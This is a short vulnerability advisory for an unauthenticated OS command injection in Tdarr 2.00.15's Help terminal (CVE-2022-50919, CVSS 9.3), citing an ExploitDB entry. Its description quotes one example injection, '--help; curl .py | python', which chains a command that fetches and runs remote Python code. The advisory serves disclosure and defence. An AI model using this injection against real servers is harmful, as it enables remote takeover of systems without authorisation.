Tdarr 2.00.15 - Command Injection | Advisories

Advisories

Tdarr 2.00.15 - Command Injection

severity: critical
date: January 13, 2026
Affecting: Tdarr 2.00.15
CVE: CVE-2022-50919
CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSS: 9.3
CVSS V4 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
References: ExploitDB-50822
Official Vendor Homepage
Credit: Sam Smith
Description: Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.